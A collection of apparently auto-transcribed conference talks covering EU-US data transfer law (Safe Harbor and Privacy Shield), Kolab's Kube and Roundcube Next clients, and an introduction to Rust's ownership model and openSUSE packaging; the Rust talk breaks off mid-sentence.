things. There will be more work done on that. Because of course, the, you know, the, the data protection people in Europe, they've, it only took a couple of days, essentially, for people to realize that there's a lot of things to be criticized. And just some of those, some of them are kind of like a principle, almost political nature, and other criticisms are really only for, for, for lawyers, shall we say, but they're not less important when it comes to actually working with the, with the thing in real life. What they're saying is that the whole thing is just super complicated. You got to skip back and forth to find stuff. And, you know, from a scientific perspective, that may not be so bad. So it's just a bit more work, but you'll find it. But in practice, that's a bad thing for, for, for a statute. Essentially, it is a statute. You got to, you have to be able to apply it to a real life situation without taking two hours to find the different bits that you need to qualify a situation. So it's just simply badly drafted. Even worse, the terminology doesn't fit at all with our data protection terminology. And even worse, it's inconsistent and contradictory, at least in the current draft, in itself. There's stuff that simply doesn't go together. There's a choice principle, which is not a choice principle, but an opt out option, which is not quite the same. And you don't know when you can exercise it, for example. And one of the things, just to give you an example, one of the things you're supposed to be able to opt out of is to say, I want no onward transfer. You know, if you, you ask company, receive certain data about me, I want to say, that's fine, but you can't transfer that data onwards to someone else for whatever reason. I can opt out of that. Now, you've got to ask the question, why do I actually have to opt out of it? Does that mean if I don't opt out? Is it lawful to transfer the data onwards? And if yes, why on what basis should that be the case? And then you look at another principle that says, well, you can only do stuff, this data, if it is within the original purpose for why you collected the data in the first place. So those things don't really go together. If I say that I have a purpose limitation, how would I ever, or in most cases, how, why would I be allowed to transfer data onwards? Why should someone have to opt out of something that, well, according to one's principle, shouldn't be lawful in the first place? So there's a lot of that stuff. You can do 10 or 15 within two minutes if you look at it with an experienced eye. So there's a lot of work to be done. And those things, they're not petty business. They're, it's one thing to like something on a political level or an abstract level. And you can discuss whatever, but if you have a set of legal rules that you cannot apply, you can simply forfeit the political discussion, because it's not simply not going to work. And as we stand, I don't think it's going to work, regardless of whether I like it or not. Now, again, they say commission, you can't just, you can't do your job assessing how things work in the United States by letting other people tell you how it works. You have to look at it yourself. And the letters that we receive, the representations that we receive, don't do the job. That's another criticism, which will play a role in a assumed court case, because that was the reason why Safe Harbor was shot down. There is no agreement at this point of when do we apply the whatever US set of data protection rules to a case and when do we apply European set of rules. And a lot of work has gone into that very question when they came up with the data protection directive in 95. And, and now we have the data protection regulation, which has actually entered into force and will be applicable in two years time. A lot of thought has gone into that and the privacy shield doesn't simply kind of, it steps away from that question, but that's a very core question because if you're an individual and you want to take recourse to someone, you have to tell the court why you, on what set of rules, on which basis you want to do that. And it's, it's something that I think to make it work, you'd have to require the framework to provide a solution for that question. Otherwise, you know, the judicial recourse that they want to establish simply how is that supposed to work and it'll make everything very difficult, very complicated and very risky for anyone to claim their rights. So that's another criticism right there. They say, you know, critics say that even though we, you know, the commission has received information on how the intelligence and on what basis the intelligence community in the United States essentially draws data, it's still not enough. We still don't know enough. Now that's of course never going to change, to be honest. So that criticism will never disappear for a reason of logic. There is no, there is no rule on when data actually, maybe actually at some point has to be deleted because, you know, you collected for some reason and that purpose normally expires at some point. No one ever deletes data, at least not if they don't, if they're not forced to. So that's a problem. And yeah, the rest is just a bit specific, shall we say. I'll skip that. So now what will happen? Of course, I don't know. As I said, the representatives of the member states still have to consent to whatever draft we end up with. We don't know the draft yet. We don't know what improvements may have been made. But if, but I expect, and it usually happens on a level, member states will consent in the end because, you know, they spend so much energy on the regulation. They've taken four years to finalize. I don't think that anyone will really, you know, deny the commission their consent because that would mean that, you know, from a business perspective, people would run into huge problems and that on a level simply won't happen. So there will be consent. So it will probably have something. I don't know if we have something by August, but this year probably will have a, you know, improved safe harbor too. And once that's in place, it's binding. You can use it as a company. You can rely on it. But on the first day it's in place, people will start, people will again try to shoot it down. And if it does not change fundamentally, it might well be shot down within the first one or two years because, you know, the reasons that the ICC gave is that it provides sufficient ground if you apply them strictly to shoot that down as well. And the court doesn't even have to go into the details. So it's just the directive calls for a comparable level of data protection in the two countries involved, EU on the one hand and the recipient country on the other hand. And that simply is not the case. It's not comparable. I'm not going to say it's worse or better. That's a debate for another day. But it's certainly not comparable. If that's the test, comparability, it'll fail. That's what I believe at least. So the bottom line is today, and in one year's time and two years' time, I think that it'll be and remain very difficult to transfer data to the United States and other countries, by the way. We always focus on the United States for historic reasons. It'll remain difficult in legal terms. And companies, but they have done in the past, and I'm sure they will do in the future as well, they're willing to take that risk because they don't have a choice. The question, of course, is product-wise, will the consumer or the company customer have alternative products that essentially offer the same or comparable quality in range? Because when we look at it, the reason why that at least for most people hasn't been the case is because the competition doesn't work, essentially. We wouldn't be talking Facebook and Google this or that if there was an alternative. But there isn't. And since it hasn't been, I don't know. But that essentially is the reason behind the whole problem. Because from a company's perspective, of course, that's an attorney's perspective as well, is at this point, most companies say, I don't have a choice. I simply don't have a choice in business terms. I have to, for example, startling. I want to use Amazon Web Services. Give me something else, but I don't know it. I'll just use it because everyone else does. And I know it works, supposedly. So that won't change. Privacy shield, whatever. It's going to be the same question, and the only solution really lies in the incompatible products, really. And we'll see where we end up. No one knows of this one. So I thank you for your attention. I know it's not for everyone, that stuff. But you've been quiet. So I thank you for that. You could have been typing. Well, and thank you for having me.
Julian Höppner, a lawyer specialised in copyright and intellectual property at the JBB law firm, sailed us through the treacherous waters of Safe Harbour and poked holes in the upcoming Privacy Shield. Julian made clear that the treaties being negotiated with the US will most likely be ineffective against government snooping and corporate espionage.
10.5446/54589 (DOI)
So, hi, I'm Christian. I'm responsible for the desktop client in Collab Systems, which so far used to be contact, or still is contact, actually. Today, I want to talk about the next generation client that we're currently working on, and show, tell you a bit how, why are, why we're doing this and what this is all about. So, Cube is the next generation collaboration and communication client that we're currently building. It's aimed at offline capable devices like laptops and mobile devices. We are looking at making it very maintainable, and that we can move fast forward without sacrificing quality on the way, so that we can do quick iterations. We look that it's very deployable in various scenarios, because we have enterprise customers, we have private customers, so we need to be able to integrate in various deployment scenarios. This also includes mobile devices. It's supposed to be a high performance and low resource using component, so it really can support you from the background, and you don't spin up your CPU, basically, because you want to read a mail. So we're, from the design, we're trying hard to ensure that it is the way that it should be, that you just really can quickly start it and stop it again, and you don't have to worry about that it uses too much RAM or anything like that. Last but not least, of course, we're working on a pretty user interface that actually also remains useful. So you may wonder why are we doing this, given that we have contact, which is a large and very powerful application, and it's a lot of effort to sort of redo that. The first reason for me, as somebody who has worked for the last six years on improving contact as a full-time job largely, is that it replaces contact. We have a lot of complexity issues, which just really showed over the last couple of years as we tried to add new features, that process was just so slow and cumbersome, and it was so hard to get the quality to a state where we needed to be, that I just realized that sometimes something must be wrong. Similarly, we have large performance issues, which then again trigger a lot of work around in trying to do caching and other optimizations, which again increases the complexity. So contact in many ways often sort of resembles a Ruhm Goldberg machine. You have many different components that interact with each other asynchronously. So that makes it very hard to reason about the state of the application and try to test it, because you have so many different combinations of those components. So that is to a large degree why it's so complex and why it's so hard to test. So with QB, initially just started thinking about how can we change the architecture of contact in a way that we can combat those problems. What we ended up with was so far away from contact that it just showed it would, it makes more sense to sort of start over on a clean slate, at least design-wise, that doesn't mean we're rewriting everything, but design-wise we started on a clean slate, tried to get that right, and then see how we can get from contact to this new architecture. So in the new architecture, if you're familiar with contact at all, we used to have the application, then we have a central server that talks to a MySQL database, and then we have different back-end processes, for instance, for NIMEP resource, for a mail-day resource, to get access to your data. In Qube, we removed that central server, you still have different back-end plugins. This is, first of useful, because these are background processes that synchronize a lot of data, do a lot of work, so you don't necessarily want it directly in your main application. It also isolates, of course, against crashes, so because this is a plugin system. So you can have people write different plugins for different back-ends. If one is of not the highest quality and the crashes, this doesn't take down your client application. We call the data access layer sync, so that's sort of the Okonadi replacement. So you have now this library that knows how to talk to the different back-ends, and then the client application, which is Qube so far, but could be more applications, of course, then directly accesses the database in process, and just talks to the resources, because it's a single-writer, multi-reader system. If we look a bit closer at the resource that is built somewhat like... So you basically have Qube here, and then you have a communication to the back-end process over a socket that just writes commands to the resource, which the resource initially simply queues. A very central piece of the resource is then the pipeline, which just eqs the queue continuously and processes these items. Eventually they'll end up in the database, so in here we can do stuff like indexing and filtering and whatnot, just any processing that needs to be applied to every modification that we have to store. And then the resource simply emits a notification that the revision of the store has now changed, and all clients can update to that. This gives us a very nice loop of how the data flows. So clients always just write that way, and on the other way around, they simply render the state of what you have in the database. So it becomes very testable because you don't really have any intermediate states that you try to synchronize. You essentially just render what you have in the database. It looks very similar on the other side, where we have the synchronization to the source, so this could be your IMAP server. You have a synchronizer process that simply tries to figure out what has changed on the server. You have some protocol support like Q-resync or so, which directly gives you the diff. Maybe you're back-end sucks and you have to do a full diff. It doesn't really matter. The synchronizer simply tries to figure out as fast as possible what has changed, creates the modifications, queues them, and that's then processed by the very simple pipeline. Having two queues here just makes sure that we can prioritize, for instance, local modifications over a background sync process where you don't really care when it finishes. And then the writeback uses the exact same mechanism. It gets notified that something has changed, and then it just replays revisions to the source. That way we have these loops in both directions. As you can see, this, of course, builds right into the design that we store, that we have an offline store that you can work against, even if you have no internet connection, and you can replay changes at any later stage. What we also made sure is that we have the right place for extensions. So in contact, we have often these fault-on extensions that are in somewhat weird places, like a scam detection in your email viewer, which means it has to be done every time you look at that email. With the pipeline, we have a nice place where we can guarantee that this pre-processor is always processed before it enters the system for the rest of the client. So we can do stuff like spam detection. We can, of course, do various indexing tasks. We can do filtering. We can do filtering in a way that we can filter it before it enters the system. So you don't have an email that pops up in your inbox and then suddenly vanishes to pop up somewhere else. We have, of course, the plugable back-end, so you can add support for new groupware servers or whatever. And then we have composable UI components on the UI side, which will eventually allow us to do more mash-ups of different views and get a bit of way of you have your email client over here and your calendar over here and your notes application somewhere else and they can't interact with each other. Because we don't want to rewrite everything from scratch that would take years, obviously, we, of course, try to reuse as much as we can from contact in KDPM, so we try to refactor stuff into libraries that we know we can share with them, contact so we can co-maintain it. And this allows us to move much faster than if we just went and wrote the client from scratch. It, of course, also allows us to learn the lessons to be learned that we have a lot of experience with the contact code base so we know where everything is implemented. We know what problems we faced with that. So we can build on that. Another large topic is performance. So in contact we have many performance problems by design sort of. One of its core concepts is that it does know what it stores so you can freely extend it with whatever. However, that also means you can't query for any data which leads to somewhat ridiculous results sometimes because if you want to show a week in your calendar what we have to do and there's no way around that we have to load all your calendar data, process it in memory, throw 99% of that data away because we don't care. And that essentially every time you look at your calendar. Same goes for email threading. We can't query for emails by date and in a threaded fashion so we load the full folder if you have 200,000 emails we load 200,000 emails in memory and then we figure out the sorting and because that is very expensive we have various caching layers that try to somehow fix that but that adds a huge amount of complexity because the caches are also somewhat expensive to build so we store them to disk now even and yeah it just becomes somewhat insane. You also have this, you have this disconnect between where your data is and where your application is and you have a protocol to fetch data but if you need too much data for what you're trying to figure out and you fetch too much you have to load that all in memory at some point this becomes a problem. If you don't fetch enough you have too many round trips in this one scale. So you're always trying to find this middle ground on what works. With Q we get rid of all those problems because you have, your database is a memory mapped file on disk directly in process. You can just read whatever you need and throw away whatever you need. It's very cheap to do multiple reads because you're just accessing a memory mapped file essentially. We just use a key value store as the database. And then of course there comes the whole startup performance and stuff. We don't have any external processes that we have to start. Resources only have to be started if you actually wanted to synchronize or update or somehow. If you want read-only access you just have everything in process. So that allows us just to solve many of those problems where we worked so hard before in working around the design constraints. On the UI side we have the UI completely written in Qt Quick. So we hope to be able to do much faster iterations and try more to figure out what users actually, what are the use cases that we actually want to solve. We want to do more a user-centered design approach, not necessarily the official methodology. But we don't want to just implement features because there used to be this feature at some point somewhere. We want to support workflows. We're working a lot together with the UX guys from KD, the KD VDG and of course the people that we have at Colab Systems. In the future we will do more really testing with users and try to evolve that slowly. But we're also really trying to focus on not just dumping too many features in there for the sake of it. Overall we build a platform for the future with Q. This is initially of course hard to get started until you're at the point where you have your minimal feature set. But this will then allow us to move much more freely in the future and actually get the client forward and not just try to play catch up with Microsoft Exchange or whatever. Since we also want to go on mobile platforms, we also make sure that the whole software stack remains very portable and controllable. So in contact we have a huge dependency chain. With Q we restrict that much more, which is of course not to say that we don't have dependencies. We use dependencies that make sense. But if we can avoid it, it depends here reasonably easy and that improves portability, then we'll go for that. We also make sure that the whole system remains testable. So we have test suites for resources for instance that you can, that sort of resources have capabilities and if a resource says I know how to deal with drafts and emails, we have a test for that. That is a standardized test. If you write a new resource and say, well, my resource can do that now, then we can verify automatically everything that we expect from the client side. Of course you have to take care of yourself that the backend actually works. And then with the platform, we also have these composable UI components that will eventually allow us, because we're doing the whole UI in QML and then these QML components know how to access their data. It becomes much easier to do integration things like that in the email view, you show the actual address book component that directly gives you access to all the data and all the actions that you expect from your address book component as well. And we can also use that directly for desktop integration. Of course we could directly show the cube calendar with all the functionality that you're used to on a plasmoid in KDE without having to reimplement any of the functionality. So this allows for much better and much easier desktop integration. So from the roadmap, we currently focus on email only because it's, first, it's from many of the data types are list based. So the email view gives us sort of the worst case scenario for that because there's lots of data. It's also performance wise the worst case because there's lots of data. And that way we can get reasonably fast way useful product. And we can be sure that our design decisions make sense because it actually scales to use case that is the hardest. We aim for a end user ready release by end of the year. We focus on getting the minimal necessary features set in there and then rather focus on polishing that to ensure that we can actually reach the quality that we aspire to reach. So we try to restrict ourselves a bit in going too crazy with the features. And then over the next year we expect to add the other group where components so you have your calendar. We'll probably have an address book of course with email client but then we'll like calendar and notes and task management. We might already have that in a preview version by end of the year but that's not necessarily the focus right now. And then from there on I hope we can really move forward in also pushing what we can do with the client and what it actually is and that instant messaging and other features and focus more on workflows rather than these isolated features that we so far had. So we can for instance support you in having meetings which involves clandering and email and having a chat and then doing notes and whatnot. So we want to really support the user more in what he's actually trying to do. So with that we get to the demo. Interesting. So that's how it currently looks. Of course it has still many UI problems but what we can see here is that if I switch for instance between these lists we don't do any caching of any sorts in these UI. So in contact we use to cache every list every time because it was very expensive to do. Because here we built the right indexes so we only have to query for what we actually want to show which is a bunch of emails that's not that hard. So we can just do that in real time which keeps the code very simple. If you switch emails then what's slow is that this is HTML and has to load some images from the Internet. So that also shows of course in the application startup time because it's essentially instant because it doesn't really have to do anything. In the background it starts the resource process so it's aware if updates come in, if the client is closed the resource process just dies because it has no clients anymore so there's no point. What we see here is also if I scroll down, if you watch the scroll bar as I go down it gets smaller which will have to fix UI wise. But the point is we, even if you have 100,000 emails in your folder we're only loading like the first thousand or so right now. And then as you get to the bottom we fetch more because we have a sort of by date index right in the storage so that allows us to efficiently just retrieve what we actually need. Yeah so then you can compose email and stuff. But that's of course very heavily working progress. So I've just finished the packages for the summit so you can actually try this yourself if you like. It's obviously not ready for production. I expect it to be usable within the next month for your email reading essentially that you can mark. You can mark emails as read and you can move them to trash. But of course it's entirely possible that it breaks over time. We don't take any care right now that it works between versions so you sort of have to nuke your data sometimes. It's available as packages for Fedora 23 and we have, so from our OBS instance and we have a flat pack definition file in the KDE flat pack application so you can build it yourself and give it a try if you like. The development planning is happening on the KDE fabricator instance so there you can follow along in what we're doing. There are different projects for the UX and people where they mostly work on mockups and then there's the technical one for sync and queue which follows more the implementation. There's the roadmap that you can follow. Yeah that's it. So Aaron will say a few words on round cube next. I'll ask should we do questions later now. Are there questions? Yeah. I have a question regarding the inclusion of sign language. Are you planning to raise our KDE module? What are your extensions? So the question was whether we plan on integrating GPG support and stuff for encryption so the answer to that is yes. So the cube is one of the reasons for cube is that this will allow us to get end to end encryption to mobile devices as well which we currently can't do over the web. So we already we got GPG support read only for free because we're using the KDPM message here component which has already that stuff built in. We don't have any key management right now. There are various plans and also improving the usability of the whole key management stuff better that you have for instance directly in the address book and indicate whether you actually are able to have a secure establish a secure connection to that person. So yes that's definitely something we're working on. Yeah. So the question was what all platforms means for the release by end of the year. All platforms for that release means Linux, Windows, Mac OS X. It does not include the mobile platforms yet. For the mobile platforms we will write an entirely different UI that adapts to the form factor. So that's also reason why we have this very clear separation between the UI and the logic and which we're forced to do of course by Qt Quick but that allows us to sort of just slap on a new UI that is actually tailored for towards the form factor. And we need to behavioral certain things like a branch database like a Thank you. Christian is taller than I am. I only noticed that once I stepped up to the mic. Yes, so obviously we're doing a lot of exciting work with Q. And if you're wondering where the name came from, this was actually an intentional callback or reference to RoundCube, which is the web app that we use with Colab, which we've been the primary developer of for many years now. In fact, there's one young fellow right there who is responsible for quite a bit of RoundCube as well. So we ran into some kind of end point issues with RoundCube 1 in the last year or so. It's a great application. It's used around the world, most popular open source web mail app out there. But to do the things we want to do with it, the developers looked at it and went, ah, we can't really accomplish what we want to accomplish, which is things like being able to extend it more easily for integration into corporate workflows, being able to have a UI that adapts if you're on a tablet, for instance. You may have noticed that RoundCube is not overly useful on a touchscreen device, especially on the smaller screen. We wanted to be able to get rid of the page reloads. We wanted a very nice modern application, which is a seamless. You load it once and you're done. So some of the more recent mail applications on the web have all done, gone that approach, that single page web app, no reloads, just the data coming across. And it enables them to do quite a few nifty little things that we also want to do. But RoundCube 1 was based on or is built around the concept of server-side rendered templates. Then you get the end results, set to you as HTML and JavaScript, but it still relies very heavily on this concept of server-side templating. So RoundCube next makes a slight departure from this and instead moves the application entirely into the client-side web browser. So you have a single page web app that delivers essentially the same functionality, but without the server-side templating. So you get zero page reload, access to all of your data, whether that's your calendar or your mail or whatnot. And it also allows us to extend what we can do with the web app. So along with Cube, which has a very similar name for good reason, there's a clear separation between the UI or a clear separation between the UI and the data. So this not only allows us to, in future, add specific plugins and components for various use cases without having to rewrite the entire business logic behind it, but it allows us to do things that should be quite trivial, such as if you use RoundCube right now with Colab, you notice we have a feature for tagging. And the tagging box appears in different parts of the screen, depending on which app you're using. Notifications are always in the browser. And if we want to change how notifications are done, we have to go around and adjust the calls everywhere that's made. So there's a lot of duplication of effort. And in RoundCube next, there's the concept of apps. So we're using Ember.js to actually do the creation of the assets. You don't need to run Node to run RoundCube next, but just to build it and to develop with it. But this allows us to do things like having an app that does notifications. So there's a PubSub, a Publish Subscribed Bus in RoundCube next that such apps can, well, subscribe to and publish to. So when applications say I have a notification and the notification app can subscribe to those messages and then do whatever is necessary for notifications, be that native desktop app, native desktop notifications, or in browser notifications, or whatnot. And all of that code and all that logic can then be put in one replaceable and reusable component that lives within the larger RoundCube next world. So in addition to that, the other really exciting thing I feel about RoundCube next and Cube is that we're designing both of the UIs together. So right now, if you have contact on one screen and you have RoundCube on the other screen, you'll notice they look somewhat different. We're doing the visual design, the workflow concepts, and all of that for both applications in tandem and with overlap in the developers and design team. So that's when we have RoundCube next and Cube, both ready for production use. You'll have Cube on one screen or multiple screens and you'll have RoundCube next on your other screens and they'll actually look like they belong together. You'll be able to take some of your workflow from one and use it in the other. So the usability will improve across the board and you'll be able to learn one way of doing things and just apply that to all of your applications. So along with Cube, the goal we have for RoundCube next is to be able to deliver a usable mail application at the end of the year so that people can start actually poking it with a stick with us and then from there we will iterate forward feature by feature by feature by feature until we have a complete replacement for RoundCube 1's current functionality with Colab and hopefully quite a bit further than that. So that in a nutshell is what we're doing with RoundCube next on the UI side. On the server side, the data delivery side, we are working with a number of companies in great open source fashion on a protocol called Jmap which basically takes the horrible thing known as IMAP and makes it a lot easier to consume from a modern style web application that includes things like having a long running update socket so that you can see without having to continuously pull or build that in on some bespoke thing on the server you can actually get your updates so when new mail is arriving immediately, these kind of little features and also just remove a lot of the IMAP insanity from your code base and you can speak this native, the J stands for JSON. So it's really built for the modern web and making it easy to use. So to that end, we plan on delivering a Jmap proxy that you can run on the server side that will sit in front of whatever your IMAP server is. There's also work ongoing to actually put Jmap support directly into the IMAP server as well that we use CYRUS IMAP. So at some point, you'll be able to just speak directly to the IMAP server except you'll be speaking Jmap to it. But in between now and then, if you're using a random IMAP server, say you're redirecting round cube to Google mail or whatever, you can use the proxy for that. Otherwise, there's not a whole lot of server side code and that's one of the nice improvements there that allows us to really lower the amount of weight that is placed on the server side and the complexity of management and deployment by moving all of that UI to the client. So we expect with that design as well, increases or improvements in scalability, which is great for those who are using it in, say, an ISP or ASP type environment or large corporate government deployments for that matter. Good. So I don't have a demo because I'm not round cube developer, so I can really talk about it. But are there any questions from that? Nope. Cool. Great. So in that case, I'll fill the time a little bit more since you asked about GPG support. There is the A plug-in for round cube one that does GPG through Mailvelope. And this is something we'll also be bringing to round cube next and probably rather nicer. And that way we have across the board your security and end encryption regardless of what application you're using at the time. Of course, your key management is still local, right, with the web app. So we don't want your keys. You don't want us to have your keys. So there is still that caveat, be able to access it at least via that route in that direction. Good. Excellent. Thank you very much. Thank you.
Christian Mollekopf, one of Kolab System's most brilliant developers, showed off the latest breakthroughs included into Kube, Kolab's next desktop client, and the cross-platform sucessor to Kontact/Kmail. Eye-candy was to be had by all. Then Aaron came up on stage to introduce the features already available in the new version of Kolab's star web client: Roundcube Next (starts at 28:25).
10.5446/54592 (DOI)
So, hello, everyone. I'm going to talk about Rust, which is programming language, and also about getting Rust into OpenSUSE and the current state of where we are. So, yeah, I'm Christoph Grönland, I'm the architect for HA at SUSE. So, it has nothing to do with Rust, but I'm interested in the language, so this is kind of my hobby. If you want to get the slides, you can get them from this URL. They will also be linked from the OpenSUSE events page, and I'll provide a PDF later. So, Rust is a programming language, developed by Mozilla primarily, intended as a replacement for C and C++, really. The idea that they had was that they needed a new language or they wanted to develop a better browser that wasn't susceptible to security holes in the same extent that the current Firefox one is. They have a big issue with buffer on the flows and buffer overflows and memory leaks and other problems like this, and they were trying to figure out a way to solve that. And so, one way would be to switch to a managed language like Java or C sharp or something like this which runs in a VM, but that comes with additional problems. So, if you run in a VM and you have garbage collection, you have a runtime, you have unpredictable memory usage, memory implications. So, basically, a modern browser is like a VM itself. It's hosting a bunch of processes, one for each tab or window, and it's hosting additional VMs inside to run JavaScript and so on. So, running all that inside a VM again would be, okay, so we're starting to get too many virtual machines on top of virtual machines to have a viable solution. So, what they wanted to do was be able to have a language that operates on the same level as C and C++, but avoids the problems that C and C++ have in exposing too much of the machinery of the system and letting you destroy yourself needlessly. So, the idea with Rust is that it's a language which makes it more difficult to do things wrong. That's the basic idea. So, today you can get the Rust compiler on open source by installing from the DevLanguage's Rust project. So, basically, the Rust compiler that we have now is a pre-built binary package. So, it's not yet ready to be included in the Tumbleweed because it's not building from source entirely. So, to build Rust, you need Rust. So, I'm going to get into more what that means, but currently you need a specific version of Rust to build any version of Rust. And that version is not necessarily the version that we already have in open source. So, yeah, it's a tricky problem. We haven't figured out how to solve it. I'm going to go into more of that. But first, I'm going to talk a little bit about the language. Well, I think I've gone into why you want it. So, yeah, zero overhead as in no runtime or VM or garbage collection. Memory safety, so a language which tries to prevent buffer overflows or pointer arithmetic so you can't just point into random memory and cause problems. You can still cause all the problems that you can cause in Rust. All Rust does is make it easier to do things right in the default case and more difficult to do things wrong. Whereas C, for example, makes it exceedingly easier to do things wrong and not even know it and very, very difficult to do things right. So that's kind of the difference in approach. A side benefit of the way they chose to handle memory was that they also introduced thread safety as a bonus. And I'm going to go into a little bit about how that works. But basically, the way that Rust handles memory has implications for threads. That means that it's impossible to create a deadlock because you just can't write the code that would cause a deadlock unless you actually have unsafe blocks in there. And yeah, the other thing is you want C-level performance. So if this an easy operability with C. So if these are things that are interesting to you then Rust might be interesting as a language. I know that there is maybe a little bit of a trepidation or fear because Rust can be very hostile because it doesn't let you do things wrong. So it's just going to, in the beginning, no matter what you do, you're going to get a lot of error messages when trying to compile. But I'll get into that too in more detail. So here is a very simple Rust program. It looks similar to C. If you look at it just like this. Already in this, there are a lot of things that are unique to Rust. For example, the exclamation mark after print LN means that this is a macro. And macros in Rust are, well, I think they are most similar to macros in templated Haskell or Scheme if you've seen those languages. And not at all like macros in C or C++. And also not especially like macros in Lisp or something like this. So it's not as free form as the macros in other languages where you can just do anything in a macro, including concatenating strings into new function calls. But it is quite good at doing some of the things in a safe way. So for example, the print LN macro just adds a new line to the end of the string and then passes it to print. And that kind of thing is quite simple to do with this macro system. To compile and run this, you use the Rust compiler or you can use the Rust compiler just like you would use GCC. So you put this in a file, call it hello.rs. You run Rust C passing it hello.rs and you get an executable just like you get from GCC. There's no runtime so it doesn't link to any big library or anything like that. But it is statically linked to the standard library that it has. So the binary will become a fat binary. Currently, there is no dynamic linking. There is some support for dynamic linking and they're working on making it better. But that's another one of the issues that we are looking at for patching for OpenSUSE. We would like to be able to dynamically link to OpenSSL for example. And currently, it's not that easy. So to scare you a little bit, here's a bigger example. So this is a Rust program which creates a second thread and uses channels to communicate between the threads and has a shared hash map where both threads try to insert into the hash map at the same time and then the main thread tries to read from the hash map. This is the kind of thing that in C or C++ is quite difficult to do in a thread safe way. And in Rust, you can't write this code in a way that would not be thread safe. Because the compiler is aware, for example, that the hash map is not thread aware. So it won't even compile code that involves multiple threads using a hash map directly. So what you need to do is you need to wrap the hash map in a mutex. You need to lock in each thread. And if you do the locking incorrectly, the compiler won't even compile the code. And you can also see a few other features of Rust here. So you can use modules. So it has like a full module system like other more modern languages to include code from other modules. You can also, so here, for example, I'm calling std colon thread colon spawn without using use std thread first. So you can just fully qualify module names and access things that way. So it has some nice features like destructuring so you can declare. So the channel function returns both the sending and receiving end of the communication channel for threads. And the return disease has a tuple of two separate things. And you can assign each name in one construction. The colon colon new is a convention for memory handling. So this is simply putting this memory on the heap. So similar to new in C++ or Java. But the memory is actually managed at compile time. So Rust will ensure that you have the correct number of allocations and everything is, every reference is scoped. So this memory is freed when both threads go out of scope, so to speak. There's a few other niceties like pattern matching that I will go into a little bit more. Something you will see a lot when you start looking at examples of Rust is this unwrap thing. So Rust doesn't have exceptions unlike Java or even C++. Instead functions usually return what is called result type, which is an enum of either okay with the value that you were after or an error. And it actually checks at compile time that you've handled all of the cases. So it forces you to check, oh, is it okay? Then I do this. If it's not okay, then I do this other thing. So here, for example, it's saying, okay, if locking succeeds, assign the result to this m variable, and then let me access it within the scope of if. And then you can then put an else and handle the failure, but in this case, it's just ignoring the error. And what unwrapped us is let you continue if everything was okay, and panic as in end the whole process if there's a failure at this point. So you see this a lot in example code because in example code, you don't want to clutter it with error handling. But of course, in a real program, you do want to handle your errors. And the nice thing with having the unwrap thing is that you have an explicit point in the code that says, okay, this is where it's going to crash if there's a failure. So the thing that Rust does is make it very explicit where your failure points are. So this makes it easy to find the source of the problem. Yeah, I'm not going to go into much more about this example right now because it's a little bit too much, but it's just showing an example of a little bit more realistic code than just the normal example code that you get for things like this. So this is a little bit about how allocation is handled in Rust. So in this example, we have the main function where we allocate. So this is simply a five, like an integer. And it's put in a box, which means that it's heap allocated. But it's lifespan is scoped by the block in which it's defined. So box two here, for example, exists until the end of the main function. You can create like a little scope like this to limit the lifetime of variables. So box three here is just going to get created and then immediately destroyed. And then in this function, the box one, this value is limited to the scope of that function. So for example, Rust wouldn't let you create a box like this and then pass it out without handling that correctly. So in this example, we're... yeah. So there's a concept of ownership and moving ownership around in Rust. So that's how it's keeping track of memory, is that the compiler keeps track of who owns a piece of memory at every state of the program. So in this case, we start the program and we create two regular variables and these are limited to the scope. So the owner is the main function in this case. We then create this five and assign the variable A to it. So at this point, main owns A. So we can actually read from it and print it at this point. If we then create a second variable called B and assign to A, if we then try to hear access A at this point, it doesn't let us because the boxed memory that we assign to A has now been... the ownership has been transferred to B in this case. So Rust will no longer let us access A because A no longer owns that memory. That memory has moved on. So if you uncomment this line and try to run this program, the compiler will say, no, A is now... doesn't own this memory. You can't access A anymore. And then in the same way, if you pass... if you create a variable B and then you pass that to a function like this, that takes a box, the ownership is transferred to that function. So if you try to use B after this point, the compiler will no longer let you. It will say, no, destroy box owned that memory. And at the end of its scope, the memory was freed because the owner of that memory went out of scope. And so it's no longer available. I freed it. And at this point, you will probably say, wow, this is completely unusable. How can I... if I can only use a variable once, how can I do anything? If I put destroy box in a loop here, it won't compile because only the first iteration of the loop, it will pass the ownership in that intrusion to the function and then free the memory. And the compiler will say, well, I mean, the second iteration, there's no memory anymore. You can't do this. So the way we get around this in Rust is with something called borrowing, which is where you can say, I'm still the owner of this memory. I want to call this function and pass it this memory. And then I let it borrow the memory for a while. And then when the function completes, I'm still the owner. The memory is still mine. So the way you do this is with the... See you. The at here, where we're saying that in this scope, well, with the at here as well. So in this scope, we're borrowing the memory of this point, which is a struct just like in C as three members. So point is the variable and main is the scope, which owns this memory, owns this variable. We create a second scope in here and we borrow it using the at here. And we can use it to look at it. But it's actually, by default, the borrows are immutable or const, you would say. So you can look at the values, at the end of the scope, the main scope still has ownership, but we can't assign to it. So to get a mutable borrow, we have to use the at, MUT, or MUT, I don't know how to pronounce that, operator. And here we can actually... So the ownership is still maintained by main, but the right rights, so to speak, the right to modify the variable is temporarily transferred to this other scope, this other variable. We can assign to the structure in here, and then at the end of scope, those rights are transferred back. So at this point, the main point variable now has the rights again. And those rights are actually transferred when it comes to writing. So they can only ever be one writer to a piece of memory. So the compiler will actually make sure that there's only one piece of code at any time which has the right to modify memory. And that is the reason why all Rust code is actually thread safe as well. Because this means that no matter how many threads you have, only one of them is at any point allowed to modify the memory. And at compile time, it will actually verify that this is true. So that's pretty cool. But it's also pretty tricky to write code in Rust because of this. Another aspect of Rust which is a little bit different from other languages is what's called traits. So the language which I think this is most similar to is Haskell. But it's also a little bit similar to the interfaces that you have in Go. So in Rust, you don't have classes like in C++ or Java. What you have is you have structs just like in C. And then you have traits which describe collections of functions that operate on a particular structure. So in this case, we're defining a trait animal and we're defining a set of methods which can be applied to an animal. But we're not actually defining any kind of structure that implements this trait at this point. So there's no base class or there's no root object that's like the default implementation. What we're saying is that there is such a thing as an animal. We haven't actually described any yet. And these are not actual functions that you can call at this point. So you need something that implements this trait. And the way this is done is you define a structure and separately from defining the structure, you define an implementation of... So this is just implementing some functions for the structure. So it's saying that, okay, so we have a structure cheap and separate from the structure definition, we define some methods for cheap. And this can be done multiple times. So you can have multiple blocks like this where you're defining methods that apply to cheap. So it's not like a class in that sense that it couples the data of the structure with the methods that can be applied to the structure. You can actually separate those. So you can have a library that provides methods for a structure that is defined elsewhere. And then we can implement the animal trait for cheap. And implement these functions for the cheap type in particular, which then lets us use these methods on cheap structures or other structures that also implement the animal trait. And we can have a function that takes an animal as parameter, uses the methods of animal on it, and 